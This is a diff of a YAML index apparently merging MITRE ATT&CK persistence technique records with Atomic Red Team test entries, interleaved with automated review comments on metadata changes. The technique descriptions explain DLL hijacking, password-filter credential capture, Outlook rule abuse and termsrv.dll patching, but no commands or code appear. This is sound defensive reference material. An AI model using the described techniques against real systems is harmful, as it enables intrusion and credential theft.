- spec_version: '2.1'
identifier: T1547.012
atomic_tests:
- name: Print Processors
@@ -49922,14 +50295,14 @@ persistence:
elevation_required: true
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -49945,8 +50318,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -49960,7 +50333,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -49986,6 +50359,10 @@ persistence:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
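Review bot: the new `Hexacorn DLL Hijacking` entry matches the `(Citation: Hexacorn DLL Hijacking)` key added to the T1574.001 description earlier in this diff, so the citation resolves, and the typographic apostrophe in `ol’` is the title as published and should stay. The adjacent, unchanged `Microsoft Security Advisory 2269637` entry reads `Microsoft. (, May 23)` with no year; not introduced here, but a pre-existing data defect worth reporting upstream.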
@@ -50013,7 +50390,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests:
- name: DLL Search Order Hijacking - amsi.dll
@@ -50082,37 +50458,7 @@ persistence:
elevation_required: true
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
@@ -50127,13 +50473,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
@@ -50141,11 +50492,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests:
- name: Code Executed Via Excel Add-in File (XLL)
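Review bot: `x_mitre_permissions_required` (`Administrator`, `User`) is dropped from T1137.006 with nothing replacing it, the same genuine field removal as in T1137 above, and it should be listed in the commit message. The rest of the hunk re-adds the five `external_references` entries (mitre-attack, FireEye Mail CDS 2018, MRWLabs Office Persistence Add-ins, Microsoft Office Add-ins, GlobalDotName Jun 2019) in a consistent `source_name`/`description`/`url` order, replacing the mixed ordering of the old block; the detection text in the earlier hunk cites `GlobalDotName Jun 2019` and `MRWLabs Office Persistence Add-ins`, both of which are present, so no dangling citations.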
@@ -50406,7 +50780,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
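Review bot: `modified` for T1505.002 goes backwards, from `'2022-04-25T14:00:00.188Z'` to `'2021-10-18T17:05:44.321Z'`, while every other object touched in this diff moves forward to a 2024 date; a regressing timestamp usually means the generator resolved an older copy of the STIX object, so check which upstream bundle this was built from before merging.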
@@ -50444,8 +50818,6 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests:
- name: Install MS Exchange Transport Agent Persistence
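Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed from T1505.002 and, unlike the other objects in this diff, no `x_mitre_attack_spec_version: 3.2.0` line is added in any of this object's hunks; together with the backwards `modified` date in the previous hunk this looks like a stale or incomplete update rather than a refresh, and the object should be regenerated from the current source.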
@@ -50493,7 +50865,7 @@ persistence:
elevation_required: true
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -50519,7 +50891,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -50561,7 +50933,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -50639,11 +51010,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -50723,35 +51093,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -50775,22 +51120,44 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests:
- name: Install and Register Password Filter DLL
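Review bot: `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) is dropped from T1556.002 with no replacement, the same field removal seen for T1137 and T1137.006, so it belongs in the commit message as well. In the unchanged detection text above, the Registry path `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages` is separated from its closing parenthesis by a line break inside a `|-` literal block, which makes the newline part of the stored string; pre-existing, but the generator should keep that path on one line.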
@@ -50888,51 +51255,18 @@ persistence:
elevation_required: true
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
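Review bot: the removed `x_mitre_version: '1.0'` is re-added unchanged in the following hunk even though `modified` for T1505.005 advances to `'2024-09-12T19:40:42.810Z'`; that is consistent with a reference-only touch rather than a content revision, but worth confirming. Also pre-existing and not from this change: in the `|-` description and detection blocks, terms such as `svchost.exe`, `ServiceDll` and `termsrv.dll` are followed by a line break before their closing punctuation, so the rendered text carries stray newlines.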
@@ -50941,19 +51275,51 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests:
- name: Simulate Patching termsrv.dll
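Review bot: `- spec_version: '2.1'` is removed here while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0 and `revoked: false` is added; this is the pattern for every technique in the patch, so if any loader or schema check relied on `spec_version` being present it needs a matching change in the same PR. The `James TermServ DLL` reference also switches to an x.com URL with a September 2024 retrieval date, which is fine, but unlike the kjaer.io reference later in this patch it is a primary source with no archive snapshot.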
@@ -51020,7 +51386,7 @@ persistence:
name: powershell
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
@@ -51112,8 +51478,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
@@ -51144,7 +51510,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests:
- name: Chrome/Chromium (Developer Mode)
@@ -51258,66 +51623,135 @@ persistence:
elevation_required: true
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
